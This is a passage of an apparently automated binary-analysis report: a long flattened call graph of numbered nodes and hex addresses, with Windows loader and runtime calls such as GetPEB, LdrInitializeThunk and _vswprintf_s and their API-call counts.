API calls 17805->17807 17806->17805 17808 1637147 17807->17808 17808->17743 17809->17804 17809->17805 17810 15d7d50 GetPEB 17809->17810 17811 16370ec 17810->17811 17811->17804 17812 16370f0 GetPEB 17811->17812 17812->17804 17813->17747 17814->17767 17816 15e16ed 17815->17816 17817 15e16f3 GetPEB 17816->17817 17818 15e16f1 17816->17818 17817->17818 17818->17772 17820 15e16da 17819->17820 17821 16255f4 17819->17821 17820->17775 17831 166bbf0 17821->17831 17825 162560a 17827 15ea1a0 17826->17827 17829 15ea192 17826->17829 17828 15ea1b0 GetPEB 17827->17828 17827->17829 17830 15ea1c1 17828->17830 17829->17776 17830->17776 17832 166bc12 17831->17832 17833 16255fb 17832->17833 17839 166c08a 17832->17839 17833->17825 17835 166bf33 17833->17835 17836 166bf4c 17835->17836 17838 166bf97 17836->17838 17847 166be9b 17836->17847 17838->17825 17840 166c0c6 17839->17840 17842 166c104 _vswprintf_s 17840->17842 17843 166bfdb 17840->17843 17842->17833 17844 166bfeb 17843->17844 17845 166bfef 17843->17845 17844->17842 17845->17844 17846 166bdfa LdrInitializeThunk 17845->17846 17846->17844 17848 166beb3 17847->17848 17849 166bf08 17848->17849 17851 15f9660 LdrInitializeThunk 17848->17851 17849->17838 17851->17849 17853 15fb64b 17852->17853 17854 15fb648 17852->17854 17857 166b590 17853->17857 17854->17783 17856 15fb74a _vswprintf_s 17856->17783 17860 166b260 17857->17860 17859 166b5a3 17859->17856 17918 160d08c 17860->17918 17862 166b26c GetPEB 17863 166b279 GetPEB 17862->17863 17865 166b293 17863->17865 17866 166b54b 17865->17866 17867 166b2ba 17865->17867 17868 166b48b 17865->17868 17872 166b56b _vswprintf_s 17866->17872 17919 1640c30 17866->17919 17869 166b2c6 17867->17869 17870 166b414 17867->17870 17871 1645720 _vswprintf_s 10 API calls 17868->17871 17873 166b2ce 17869->17873 17874 166b32d 17869->17874 17876 1645720 _vswprintf_s 10 API calls 17870->17876 17875 166b49e 17871->17875 17872->17859 17878 166b2f3 17873->17878 17879 166b2da 17873->17879 17885 166b396 17874->17885 17891 166b34d 17874->17891 17914 166b2eb 17874->17914 17883 1645720 _vswprintf_s 10 API calls 17875->17883 17880 166b427 17876->17880 17882 1645720 _vswprintf_s 10 API calls 17878->17882 17881 1645720 _vswprintf_s 10 API calls 17879->17881 17884 1645720 _vswprintf_s 10 API calls 17880->17884 17881->17914 17887 166b302 17882->17887 17888 166b4c2 17883->17888 17890 166b43e 17884->17890 17889 1645720 _vswprintf_s 10 API calls 17885->17889 17886 1645720 _vswprintf_s 10 API calls 17893 166b4fd 17886->17893 17894 1645720 _vswprintf_s 10 API calls 17887->17894 17895 166b4cc 17888->17895 17904 166b320 17888->17904 17896 166b3aa 17889->17896 17897 1645720 _vswprintf_s 10 API calls 17890->17897 17892 1645720 _vswprintf_s 10 API calls 17891->17892 17898 166b361 17892->17898 17899 166b519 17893->17899 17907 1645720 _vswprintf_s 10 API calls 17893->17907 17900 166b311 17894->17900 17901 1645720 _vswprintf_s 10 API calls 17895->17901 17902 166b38f 17896->17902 17903 166b3b6 17896->17903 17897->17904 17898->17902 17906 166b371 17898->17906 17908 1645720 _vswprintf_s 10 API calls 17899->17908 17909 1645720 _vswprintf_s 10 API calls 17900->17909 17901->17914 17911 1645720 _vswprintf_s 10 API calls 17902->17911 17910 1645720 _vswprintf_s 10 API calls 17903->17910 17905 1645720 _vswprintf_s 10 API calls 17904->17905 17904->17914 17905->17914 17915 1645720 _vswprintf_s 10 API calls 17906->17915 17907->17899 17912 166b528 17908->17912 17909->17904 17913 166b3c5 17910->17913 17911->17914 17912->17866 17917 1645720 _vswprintf_s 10 API calls 17912->17917 17916 1645720 _vswprintf_s 10 API calls 17913->17916 17914->17886 17915->17914 17916->17914 17917->17866 17918->17862 17920 1640c50 17919->17920 17921 1640c49 17919->17921 17922 164193b _vswprintf_s LdrInitializeThunk 17920->17922 17921->17872 17923 1640c5e 17922->17923 17923->17921 17924 1641c76 _vswprintf_s LdrInitializeThunk 17923->17924 17925 1640c70 17924->17925 17926 1640fec _vswprintf_s 12 API calls 17925->17926 17927 1640c91 17926->17927 17928 164193b _vswprintf_s LdrInitializeThunk 17927->17928 17928->17921 17935 15f9670 17929->17935 17937 15f967a 17935->17937 17938 15f968f LdrInitializeThunk 17937->17938 17939 15f9681 17937->17939 17941 15bb180 _vswprintf_s 17940->17941 17942 15bb1b0 GetPEB 17941->17942 17949 15bb1c0 _vswprintf_s 17941->17949 17942->17949 17943 160d130 _vswprintf_s 10 API calls 17944 15bb1de 17943->17944 17944->17731 17946 1614904 GetPEB 17947 15bb1d1 _vswprintf_s 17946->17947 17947->17943 17949->17946 17949->17947 17950 15fe2d0 17949->17950 17953 15fe2ed 17950->17953 17952 15fe2e8 17952->17949 17954 15fe2fb 17953->17954 17956 15fe30f 17953->17956 17962 15fb58e 17954->17962 17957 15fe332 17956->17957 17958 15fe31e 17956->17958 17967 1602440 17957->17967 17959 15fb58e _vswprintf_s 12 API calls 17958->17959 17961 15fe307 _vswprintf_s 17959->17961 17961->17952 17963 15bb150 _vswprintf_s 12 API calls 17962->17963 17964 15fb627 17963->17964 17965 15fb640 _vswprintf_s 12 API calls 17964->17965 17966 15fb632 17965->17966 17966->17961 17968 160249a 17967->17968 17969 16024af 17967->17969 17970 15fb58e _vswprintf_s 12 API calls 17968->17970 17971 16024b7 17969->17971 17979 16024cc __aulldvrm _vswprintf_s 17969->17979 17973 16024a4 17970->17973 17972 15fb58e _vswprintf_s 12 API calls 17971->17972 17972->17973 17974 15fb640 _vswprintf_s 12 API calls 17973->17974 17975 1602d6e 17974->17975 17975->17961 17976 1602d4f 17978 15fb58e _vswprintf_s 12 API calls 17976->17978 17977 16058ee 12 API calls __cftof 17977->17979 17978->17973 17979->17973 17979->17976 17979->17977 17981 15b4dfa 17980->17981 17984 15b4dd1 17980->17984 17982 15b2e9f LdrInitializeThunk 17981->17982 17982->17984 17983 15b4df3 17983->17705 17984->17983 17999 15b4f2e 17984->17999 18052 160d0e8 17986->18052 17988 164ff1c GetPEB 17989 164ff43 GetPEB 17988->17989 17990 164ff2b 17988->17990 17992 164ff6e 17989->17992 17993 164ff4f 17989->17993 17990->17989 17991 164ffb1 17990->17991 17995 160d130 _vswprintf_s 12 API calls 17991->17995 17994 15ee730 2 API calls 17992->17994 17996 1645720 _vswprintf_s 12 API calls 17993->17996 17998 164ff7d 17994->17998 17997 164ffb6 17995->17997 17996->17992 17997->17708 17998->17708 18000 1610b85 17999->18000 18005 15b4f3e 17999->18005 18001 1610b8b GetPEB 18000->18001 18002 1610b9a 18000->18002 18001->18002 18003 1610b9f 18001->18003 18008 16888f5 18002->18008 18005->18000 18006 15b4f5b GetPEB 18005->18006 18006->18000 18007 15b4f6e 18006->18007 18007->17983 18009 1688901 _vswprintf_s 18008->18009 18014 15bcc50 18009->18014 18011 168891f 18012 160d130 _vswprintf_s 12 API calls 18011->18012 18013 1688946 18012->18013 18013->18003 18018 15bcc79 18014->18018 18015 15bcc7e 18016 15fb640 _vswprintf_s 12 API calls 18015->18016 18017 15bcc89 18016->18017 18017->18011 18018->18015 18020 15eb230 18018->18020 18021 162a2f6 18020->18021 18022 15eb26a 18020->18022 18022->18021 18024 162a2fd 18022->18024 18028 15eb2ab _vswprintf_s 18022->18028 18023 15fb640 _vswprintf_s 12 API calls 18026 15eb2d0 18023->18026 18025 15eb2b5 18024->18025 18038 1685ba5 18024->18038 18025->18021 18025->18023 18026->18015 18028->18025 18030 15bccc0 18028->18030 18031 15bcd04 18030->18031 18037 15bcd95 18031->18037 18048 15bb150 18031->18048 18034 15bb150 _vswprintf_s 12 API calls 18035 1614e14 18034->18035 18036 15bb150 _vswprintf_s 12 API calls 18035->18036 18036->18037 18037->18025 18039 1685bb4 _vswprintf_s 18038->18039 18041 1684c56 12 API calls 18039->18041 18045 1685c10 18039->18045 18046 1685c2a _vswprintf_s 18039->18046 18040 160d130 _vswprintf_s 12 API calls 18042 16863e5 18040->18042 18041->18046 18042->18025 18044 15f6de6 32 API calls 18044->18046 18045->18040 18046->18044 18046->18045 18047 16860cf GetPEB 18046->18047 18051 15f9710 LdrInitializeThunk 18046->18051 18047->18046 18049 15bb171 _vswprintf_s 12 API calls 18048->18049 18050 15bb16e 18049->18050 18050->18034 18051->18046 18052->17988 18053->17714 18307 16702f7 18308 1670323 18307->18308 18311 16703b0 18308->18311 18321 1670a28 18308->18321 18310 16703d1 18311->18310 18355 167bcd2 18311->18355 18312 1670342 18312->18311 18325 167bbbb 18312->18325 18315 167035f 18315->18311 18334 168dfce 18315->18334 18322 1670a57 18321->18322 18324 1670a4d 18321->18324 18359 15e4e70 18322->18359 18324->18312 18326 167bbde 18325->18326 18374 167bd54 18326->18374 18329 167bc3c 18329->18315 18330 167bc17 18378 167f9a1 18330->18378 18331 167bc3e 18388 167aa16 18331->18388 18337 168dff0 18334->18337 18339 168e19d 18334->18339 18335 15fb640 _vswprintf_s 12 API calls 18336 1670388 18335->18336 18336->18311 18342 16703da 18336->18342 18337->18339 19175 168e62a 18337->19175 18339->18335 18341 168e1cd 18341->18339 19183 168e5b6 18341->19183 18343 167bbbb 267 API calls 18342->18343 18346 1670404 18343->18346 18344 167039a 18344->18311 18351 168e4b3 18344->18351 18345 167058b 18345->18344 18347 167bcd2 256 API calls 18345->18347 18346->18344 18346->18345 19197 1670150 18346->19197 18347->18344 18353 168e4c9 18351->18353 18352 168e5a7 18352->18311 18353->18352 18354 168e5b6 12 API calls 18353->18354 18354->18352 18356 167bceb 18355->18356 19203 167ae44 18356->19203 18360 15e4e94 18359->18360 18364 15e4ec0 18359->18364 18361 15fb640 _vswprintf_s 12 API calls 18360->18361 18362 15e4eac 18361->18362 18362->18324 18364->18360 18365 1668df1 18364->18365 18373 160d0e8 18365->18373 18367 1668dfd GetPEB 18368 1668e10 18367->18368 18369 1645720 _vswprintf_s 12 API calls 18368->18369 18370 1668e2f 18368->18370 18369->18370 18371 160d130 _vswprintf_s 12 API calls 18370->18371 18372 1668ebd 18371->18372 18372->18360 18373->18367 18375 167bd63 18374->18375 18376 167bc04 18374->18376 18377 15e4e70 13 API calls 18375->18377 18376->18329 18376->18330 18376->18331 18377->18376 18379 167f9d6 18378->18379 18400 168022c 18379->18400 18381 167f9e1 18382 167f9e7 18381->18382 18384 167fa16 18381->18384 18406 16805ac 18381->18406 18382->18329 18386 167fa1a _vswprintf_s 18384->18386 18422 168070d 18384->18422 18386->18382 18436 1680a13 18386->18436 18390 167aa44 18388->18390 18389 167aa66 18391 15d7d50 GetPEB 18389->18391 18390->18389 18995 167ab54 18390->18995 18393 167ab0f 18391->18393 18394 167ab23 18393->18394 18395 167ab13 GetPEB 18393->18395 18396 167ab2d GetPEB 18394->18396 18397 167ab49 18394->18397 18395->18394 18396->18397 18398 167ab3c 18396->18398 18397->18329 19007 167131b 18398->19007 18402 1680278 18400->18402 18401 16802c2 18404 16802e9 18401->18404 18471 160cf85 18401->18471 18402->18401 18444 1680ea5 18402->18444 18404->18381 18410 16805d1 18406->18410 18407 16806db 18407->18384 18408 1680652 18409 167a854 33 API calls 18408->18409 18412 1680672 18409->18412 18410->18407 18410->18408 18411 167a80d 28 API calls 18410->18411 18411->18408 18412->18407 18711 1681293 18412->18711 18415 15d7d50 GetPEB 18416 168069c 18415->18416 18417 16806b0 18416->18417 18418 16806a0 GetPEB 18416->18418 18417->18407 18419 16806ba GetPEB 18417->18419 18418->18417 18419->18407 18420 16806c9 18419->18420 18421 167138a 14 API calls 18420->18421 18421->18407 18423 1680734 18422->18423 18424 16807d2 18423->18424 18425 167afde 33 API calls 18423->18425 18424->18386 18426 1680782 18425->18426 18427 1681293 33 API calls 18426->18427 18428 168078e 18427->18428 18429 15d7d50 GetPEB 18428->18429 18430 1680793 18429->18430 18431 16807a7 18430->18431 18432 1680797 GetPEB 18430->18432 18431->18424 18433 16807b1 GetPEB 18431->18433 18432->18431 18433->18424 18434 16807c0 18433->18434 18715 16714fb 18434->18715 18437 1680a3c 18436->18437 18723 1680392 18437->18723 18440 160cf85 33 API calls 18442 1680aec 18440->18442 18441 1680b19 18441->18382 18442->18441 18443 1681074 35 API calls 18442->18443 18443->18441 18475 167ff69 18444->18475 18446 168105b 18448 1681055 18446->18448 18519 1681074 18446->18519 18447 1680f32 18485 167a854 18447->18485 18448->18401 18451 1680fab 18455 15d7d50 GetPEB 18451->18455 18452 1680ecb 18452->18446 18452->18447 18481 167a80d 18452->18481 18456 1680fcf 18455->18456 18458 1680fe3 18456->18458 18459 1680fd3 GetPEB 18456->18459 18457 1680f50 18457->18446 18457->18451 18493 16815b5 18457->18493 18460 1680fed GetPEB 18458->18460 18461 168100e 18458->18461 18459->18458 18460->18461 18462 1680ffc 18460->18462 18463 15d7d50 GetPEB 18461->18463 18497 167138a 18462->18497 18464 1681013 18463->18464 18466 1681027 18464->18466 18467 1681017 GetPEB 18464->18467 18468 1681041 18466->18468 18505 166fec0 18466->18505 18467->18466 18468->18448 18513 16752f8 18468->18513 18472 160cf98 18471->18472 18473 160cfb1 18472->18473 18474 16752f8 33 API calls 18472->18474 18473->18404 18474->18473 18476 167ffd1 18475->18476 18479 167ff9f 18475->18479 18477 167a854 33 API calls 18476->18477 18478 167fff1 18477->18478 18478->18452 18479->18476 18480 167a80d 28 API calls 18479->18480 18480->18476 18482 167a84e 18481->18482 18483 167a81c 18481->18483 18482->18447 18531 166ff41 18483->18531 18486 167a8c0 18485->18486 18488 167a941 18485->18488 18486->18488 18604 167f021 18486->18604 18489 167aa00 18488->18489 18608 16753d9 18488->18608 18491 15fb640 _vswprintf_s 12 API calls 18489->18491 18492 167aa10 18491->18492 18492->18457 18494 16815d0 18493->18494 18496 16815d7 18493->18496 18495 168165e LdrInitializeThunk 18494->18495 18495->18496 18496->18457 18498 16713af _vswprintf_s 18497->18498 18499 15d7d50 GetPEB 18498->18499 18500 16713d2 18499->18500 18501 16713d6 GetPEB 18500->18501 18502 16713e6 _vswprintf_s 18500->18502 18501->18502 18503 15fb640 _vswprintf_s 12 API calls 18502->18503 18504 167140b 18503->18504 18504->18461 18506 166fee5 _vswprintf_s 18505->18506 18507 15d7d50 GetPEB 18506->18507 18508 166ff02 18507->18508 18509 166ff06 GetPEB 18508->18509 18510 166ff16 _vswprintf_s 18508->18510 18509->18510 18511 15fb640 _vswprintf_s 12 API calls 18510->18511 18512 166ff3b 18511->18512 18512->18468 18514 16753c7 18513->18514 18515 1675321 18513->18515 18517 15fb640 _vswprintf_s 12 API calls 18514->18517 18516 1637b9c 33 API calls 18515->18516 18516->18514 18518 16753d5 18517->18518 18518->18448 18520 16810b0 18519->18520 18521 1681095 18519->18521 18669 167afde 18520->18669 18522 168165e LdrInitializeThunk 18521->18522 18522->18520 18525 15d7d50 GetPEB 18526 16810cd 18525->18526 18527 16810e1 18526->18527 18528 16810d1 GetPEB 18526->18528 18529 16810fa 18527->18529 18678 166fe3f 18527->18678 18528->18527 18529->18448 18532 166ff4d _vswprintf_s 18531->18532 18533 166ffaf _vswprintf_s 18532->18533 18535 1672073 18532->18535 18533->18482 18545 166fd22 18535->18545 18537 167207d 18538 1672085 18537->18538 18539 16720a4 18537->18539 18540 1668df1 13 API calls 18538->18540 18544 16720be 18539->18544 18548 1671c06 GetPEB 18539->18548 18541 16720a2 18540->18541 18541->18533 18544->18533 18546 15f9670 _vswprintf_s LdrInitializeThunk 18545->18546 18547 166fd3d 18546->18547 18547->18537 18549 1671c20 GetPEB 18548->18549 18550 1671c3d 18548->18550 18551 15bb150 _vswprintf_s 12 API calls 18549->18551 18552 15bb150 _vswprintf_s 12 API calls 18550->18552 18553 1671c3a 18551->18553 18552->18553 18554 15bb150 _vswprintf_s 12 API calls 18553->18554 18555 1671c5a GetPEB 18554->18555 18557 1671ce7 GetPEB 18555->18557 18558 1671d04 18555->18558 18559 15bb150 _vswprintf_s 12 API calls 18557->18559 18560 15bb150 _vswprintf_s 12 API calls 18558->18560 18561 1671d01 18559->18561 18560->18561 18562 15bb150 _vswprintf_s 12 API calls 18561->18562 18563 1671d1c 18562->18563 18564 1671d27 GetPEB 18563->18564 18592 1671d66 18563->18592 18566 1671d32 GetPEB 18564->18566 18567 1671d4f 18564->18567 18565 1671d70 GetPEB 18568 1671d7b GetPEB 18565->18568 18569 1671d98 18565->18569 18571 15bb150 _vswprintf_s 12 API calls 18566->18571 18572 15bb150 _vswprintf_s 12 API calls 18567->18572 18573 15bb150 _vswprintf_s 12 API calls 18568->18573 18575 15bb150 _vswprintf_s 12 API calls 18569->18575 18570 1671db9 GetPEB 18577 1671dc4 GetPEB 18570->18577 18578 1671de1 18570->18578 18576 1671d4c 18571->18576 18572->18576 18579 1671d95 18573->18579 18574 1671e0a GetPEB 18583 1671e15 GetPEB 18574->18583 18584 1671e32 18574->18584 18575->18579 18585 15bb150 _vswprintf_s 12 API calls 18576->18585 18580 15bb150 _vswprintf_s 12 API calls 18577->18580 18581 15bb150 _vswprintf_s 12 API calls 18578->18581 18589 15bb150 _vswprintf_s 12 API calls 18579->18589 18588 1671dde 18580->18588 18581->18588 18582 1671e52 GetPEB 18586 1671e5d GetPEB 18582->18586 18587 1671e7a 18582->18587 18590 15bb150 _vswprintf_s 12 API calls 18583->18590 18591 15bb150 _vswprintf_s 12 API calls 18584->18591 18585->18592 18593 15bb150 _vswprintf_s 12 API calls 18586->18593 18594 15bb150 _vswprintf_s 12 API calls 18587->18594 18596 15bb150 _vswprintf_s 12 API calls 18588->18596 18595 1671daf 18589->18595 18597 1671e2f 18590->18597 18591->18597 18592->18565 18592->18595 18598 1671e77 18593->18598 18594->18598 18595->18570 18599 1671df8 18595->18599 18596->18599 18600 15bb150 _vswprintf_s 12 API calls 18597->18600 18601 15bb150 _vswprintf_s 12 API calls 18598->18601 18599->18574 18599->18582 18602 1671e4f 18600->18602 18603 1671e90 GetPEB 18601->18603 18602->18582 18603->18544 18605 167f03a 18604->18605 18622 167ee22 18605->18622 18609 16753f7 18608->18609 18610 1675552 18608->18610 18612 1675403 18609->18612 18613 16754eb 18609->18613 18611 167547c 18610->18611 18615 1637b9c 33 API calls 18610->18615 18614 15fb640 _vswprintf_s 12 API calls 18611->18614 18616 1675481 18612->18616 18617 167540b 18612->18617 18613->18611 18619 1637b9c 33 API calls 18613->18619 18618 16755bd 18614->18618 18615->18611 18616->18611 18620 1637b9c 33 API calls 18616->18620 18617->18611 18653 1637b9c 18617->18653 18618->18489 18619->18611 18620->18611 18623 167ee5d 18622->18623 18626 167ee73 18623->18626 18627 167ef09 18623->18627 18624 15fb640 _vswprintf_s 12 API calls 18625 167efd4 18624->18625 18625->18488 18632 167eef5 18626->18632 18633 167f607 18626->18633 18627->18632 18638 167f8c5 18627->18638 18632->18624 18634 167f626 18633->18634 18635 167eedd 18634->18635 18644 168165e 18634->18644 18635->18632 18637 15f96e0 LdrInitializeThunk 18635->18637 18637->18632 18639 167f8ea 18638->18639 18640 167f932 18639->18640 18641 167f607 LdrInitializeThunk 18639->18641 18640->18632 18642 167f90f 18641->18642 18642->18640 18652 15f96e0 LdrInitializeThunk 18642->18652 18647 168166a _vswprintf_s 18644->18647 18645 1681869 _vswprintf_s 18645->18634 18647->18645 18648 1681d55 18647->18648 18649 1681d61 _vswprintf_s 18648->18649 18650 1681fc5 _vswprintf_s 18649->18650 18651 15f96e0 _vswprintf_s LdrInitializeThunk 18649->18651 18650->18647 18651->18650 18652->18640 18656 15f1130 18653->18656 18659 15f115f 18656->18659 18660 162cd96 18659->18660 18661 15f11a8 18659->18661 18661->18660 18662 162cd9d 18661->18662 18667 15f11e9 _vswprintf_s 18661->18667 18663 15f12bd 18662->18663 18665 1685ba5 33 API calls 18662->18665 18663->18660 18664 15fb640 _vswprintf_s 12 API calls 18663->18664 18666 15f1159 18664->18666 18665->18663 18666->18611 18667->18663 18668 15bccc0 _vswprintf_s 12 API calls 18667->18668 18668->18663 18670 167b00a 18669->18670 18671 167b039 18669->18671 18670->18671 18673 167b00e 18670->18673 18674 167b035 18671->18674 18695 15f96e0 LdrInitializeThunk 18671->18695 18672 167b026 18672->18525 18673->18672 18686 167f209 18673->18686 18674->18672 18677 16753d9 33 API calls 18674->18677 18677->18672 18679 166fe64 _vswprintf_s 18678->18679 18680 15d7d50 GetPEB 18679->18680 18681 166fe81 18680->18681 18682 166fe85 GetPEB 18681->18682 18683 166fe95 _vswprintf_s 18681->18683 18682->18683 18684 15fb640 _vswprintf_s 12 API calls 18683->18684 18685 166feba 18684->18685 18685->18529 18687 167f23b 18686->18687 18688 167f241 18687->18688 18689 167f27a 18687->18689 18696 15f96e0 LdrInitializeThunk 18688->18696 18694 167f28f _vswprintf_s 18689->18694 18697 15f96e0 LdrInitializeThunk 18689->18697 18693 167f26d 18693->18674 18694->18693 18698 167f7dd 18694->18698 18695->18674 18696->18693 18697->18694 18699 167f803 18698->18699 18704 167f4a1 18699->18704 18703 167f82d 18703->18693 18705 167f4bc 18704->18705 18706 168165e LdrInitializeThunk 18705->18706 18708 167f4ea 18706->18708 18707 167f51c 18710 15f96e0 LdrInitializeThunk 18707->18710 18708->18707 18709 168165e LdrInitializeThunk 18708->18709 18709->18708 18710->18703 18712 1680697 18711->18712 18713 16812b2 18711->18713 18712->18415 18714 16752f8 33 API calls 18713->18714 18714->18712 18716 1671520 _vswprintf_s 18715->18716 18717 15d7d50 GetPEB 18716->18717 18718 1671543 18717->18718 18719 1671547 GetPEB 18718->18719 18720 1671557 _vswprintf_s 18718->18720 18719->18720 18721 15fb640 _vswprintf_s 12 API calls 18720->18721 18722 167157c 18721->18722 18722->18424 18724 16803a0 18723->18724 18725 1680589 18724->18725 18726 168070d 36 API calls 18724->18726 18728 165da47 18724->18728 18725->18440 18726->18724 18729 165da9b 18728->18729 18730 165da51 18728->18730 18729->18724 18730->18729 18734 15dc4a0 18730->18734 18751 15dc577 18734->18751 18736 15dc4cc 18744 15dc52c 18736->18744 18759 15dc182 18736->18759 18737 15fb640 _vswprintf_s 12 API calls 18738 15dc545 18737->18738 18738->18729 18745 167526e 18738->18745 18740 15dc515 18740->18744 18770 15ddbe9 18740->18770 18741 15dc4f9 18741->18740 18741->18744 18788 15de180 18741->18788 18744->18737 18746 16752a4 18745->18746 18747 167528d 18745->18747 18749 15fb640 _vswprintf_s 12 API calls 18746->18749 18748 1637b9c 33 API calls 18747->18748 18748->18746 18750 16752af 18749->18750 18750->18729 18752 15dc5b5 18751->18752 18756 15dc583 18751->18756 18753 15dc5ce 18752->18753 18754 15dc5bb GetPEB 18752->18754 18755 16888f5 33 API calls 18753->18755 18754->18753 18757 15dc5ad 18754->18757 18755->18757 18756->18752 18758 15dc59e GetPEB 18756->18758 18757->18736 18758->18752 18758->18757 18760 15dc1c4 18759->18760 18769 15dc1a2 18759->18769 18761 15d7d50 GetPEB 18760->18761 18762 15dc1dc 18761->18762 18763 1622d65 GetPEB 18762->18763 18764 15dc1e4 18762->18764 18765 1622d78 18763->18765 18764->18765 18767 15dc1f2 18764->18767 18809 1688d34 18765->18809 18767->18769 18791 15db944 18767->18791 18769->18741 18771 15ddc05 18770->18771 18776 15ddc54 18771->18776 18838 15b4510 18771->18838 18772 15d7d50 GetPEB 18774 15ddd10 18772->18774 18777 15ddd18 18774->18777 18778 1623aff GetPEB 18774->18778 18776->18772 18780 1623b12 18777->18780 18781 15ddd29 18777->18781 18778->18780 18779 15bcc50 33 API calls 18779->18776 18846 1688ed6 18780->18846 18830 15ddd82 18781->18830 18783 1623b1b 18783->18783 18786 15db944 17 API calls 18787 15ddd45 18786->18787 18787->18744 18789 15dc577 35 API calls 18788->18789 18790 15de198 18789->18790 18790->18740 18792 15dbadd 18791->18792 18803 15db980 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 18791->18803 18793 15d7d50 GetPEB 18792->18793 18799 15dbab7 18792->18799 18795 15dbaee 18793->18795 18794 15fb640 _vswprintf_s 12 API calls 18796 15dbad9 18794->18796 18797 15dbaf6 18795->18797 18798 1622caf GetPEB 18795->18798 18796->18769 18797->18799 18816 1688cd6 18797->18816 18804 1622cc2 GetPEB 18798->18804 18799->18794 18800 15d7d50 GetPEB 18801 15dbaa1 18800->18801 18801->18804 18805 15dbaa9 18801->18805 18803->18799 18803->18800 18806 1622cd5 18804->18806 18805->18799 18805->18806 18823 1688f6a 18806->18823 18808 1622ce2 18808->18808 18810 15d7d50 GetPEB 18809->18810 18811 1688d5a 18810->18811 18812 1688d5e GetPEB 18811->18812 18813 1688d6e _vswprintf_s 18811->18813 18812->18813 18814 15fb640 _vswprintf_s 12 API calls 18813->18814 18815 1688d91 18814->18815 18815->18769 18817 15d7d50 GetPEB 18816->18817 18818 1688cf9 18817->18818 18819 1688cfd GetPEB 18818->18819 18820 1688d0d _vswprintf_s 18818->18820 18819->18820 18821 15fb640 _vswprintf_s 12 API calls 18820->18821 18822 1688d30 18821->18822 18822->18799 18824 15d7d50 GetPEB 18823->18824 18825 1688f9c 18824->18825 18826 1688fa0 GetPEB 18825->18826 18827 1688fb0 _vswprintf_s 18825->18827 18826->18827 18828 15fb640 _vswprintf_s 12 API calls 18827->18828 18829 1688fd3 18828->18829 18829->18808 18833 15dddbc 18830->18833 18831 15ddd3b 18831->18786 18832 15ceef0 27 API calls 18832->18833 18833->18831 18833->18832 18834 15ddeee 18833->18834 18835 15ceb70 33 API calls 18834->18835 18836 15ddf0b 18835->18836 18836->18831 18853 15ddf70 18836->18853 18839 15b458f 18838->18839 18840 15b4523 18838->18840 18839->18779 18840->18839 18841 15bb150 _vswprintf_s 12 API calls 18840->18841 18842 16108f7 18841->18842 18843 15bb150 _vswprintf_s 12 API calls 18842->18843 18844 1610901 18843->18844 18845 15bb150 _vswprintf_s 12 API calls 18844->18845 18845->18839 18847 15d7d50 GetPEB 18846->18847 18848 1688f2f 18847->18848 18849 1688f33 GetPEB 18848->18849 18850 1688f43 _vswprintf_s 18848->18850 18849->18850 18851 15fb640 _vswprintf_s 12 API calls 18850->18851 18852 1688f66 18851->18852 18852->18783 18854 15ddf7c _vswprintf_s 18853->18854 18856 15ddfba 18854->18856 18857 15ddfe5 18854->18857 18874 15ddfbf 18854->18874 18875 15ce510 18856->18875 18859 15de07c 18857->18859 18860 15ddff2 18857->18860 18858 15ddfdf _vswprintf_s 18858->18831 18972 15ef8f2 18859->18972 18862 15ddffb 18860->18862 18863 15de075 18860->18863 18903 15e0075 18862->18903 18958 15e36e9 18863->18958 18867 15de000 18868 1623b30 18867->18868 18869 15de01e 18867->18869 18867->18874 18987 1635510 18868->18987 18869->18874 18931 15bb1e1 18869->18931 18894 15de090 18874->18894 18876 15cb02a 20 API calls 18875->18876 18889 15ce57e 18876->18889 18877 15ce8b4 18878 15c8794 63 API calls 18877->18878 18893 15ce8ec 18877->18893 18880 15ce8d0 18878->18880 18879 15ce904 18883 15ce90c 18879->18883 18884 15bb1e1 19 API calls 18879->18884 18885 15cb02a 20 API calls 18880->18885 18880->18893 18881 15f97a0 _vswprintf_s LdrInitializeThunk 18881->18879 18882 15ce95a 18882->18874 18883->18874 18886 161b98c 18884->18886 18885->18893 18887 161b7e9 18888 1635510 12 API calls 18887->18888 18887->18893 18888->18893 18889->18877 18889->18882 18889->18887 18890 15ce783 18889->18890 18892 160cdfa 12 API calls 18889->18892 18889->18893 18891 1635510 12 API calls 18890->18891 18890->18893 18891->18893 18892->18889 18893->18879 18893->18881 18895 1623b90 18894->18895 18896 15de099 18894->18896 18897 15bb1e1 19 API calls 18895->18897 18899 15ceef0 27 API calls 18896->18899 18902 15de0e1 18896->18902 18898 1623ba6 18897->18898 18898->18898 18900 15de0bc 18899->18900 18901 15ceb70 33 API calls 18900->18901 18901->18902 18902->18858 18904 15e00d9 18903->18904 18926 15e00ea _vswprintf_s 18903->18926 18905 15dc07f 20 API calls 18904->18905 18904->18926 18905->18926 18906 15dfda0 98 API calls 18906->18926 18907 15e0223 18909 15e022f 18907->18909 18910 15e02ba 18907->18910 18908 15ca8c0 14 API calls 18908->18926 18911 15e002d 6 API calls 18909->18911 18912 15ef99e 64 API calls 18910->18912 18913 15e0234 18911->18913 18914 15e023c 18912->18914 18913->18914 18918 1636dc9 62 API calls 18913->18918 18919 1624c11 18914->18919 18920 15e024a 18914->18920 18915 15bad30 GetPEB 18915->18926 18916 15e02d6 GetPEB 18916->18926 18917 15e02f3 53 API calls 18917->18926 18918->18914 18923 15bad30 GetPEB 18919->18923 18921 15e02d6 GetPEB 18920->18921 18924 15e026a 18921->18924 18922 15e03e2 218 API calls 18922->18926 18925 1624c1a 18923->18925 18927 15e0274 18924->18927 18929 15eb390 GetPEB 18924->18929 18925->18925 18926->18906 18926->18907 18926->18908 18926->18915 18926->18916 18926->18917 18926->18922 18928 15fb640 _vswprintf_s 12 API calls 18927->18928 18930 15e0287 18928->18930 18929->18927 18930->18867 18932 15d7d50 GetPEB 18931->18932 18933 15bb1f1 18932->18933 18934 15bb1f9 18933->18934 18935 1614a0e GetPEB 18933->18935 18936 1614a21 GetPEB 18934->18936 18937 15bb207 18934->18937 18935->18936 18936->18937 18959 15c6a3a 53 API calls 18958->18959 18960 15e3743 18959->18960 18961 15e3792 18960->18961 18962 15e02f3 53 API calls 18960->18962 18963 15e37a5 18961->18963 18965 15e03e2 218 API calls 18961->18965 18969 15e3760 18962->18969 18964 15e37b9 18963->18964 18967 15bad30 GetPEB 18963->18967 18966 15fb640 _vswprintf_s 12 API calls 18964->18966 18965->18963 18968 15e37cc 18966->18968 18967->18964 18968->18867 18969->18961 18970 15e37d0 18969->18970 18971 15ef99e 64 API calls 18970->18971 18971->18963 18973 15ef948 18972->18973 18974 15ef97e 18973->18974 18975 15ef952 18973->18975 18977 15c6b6b 52 API 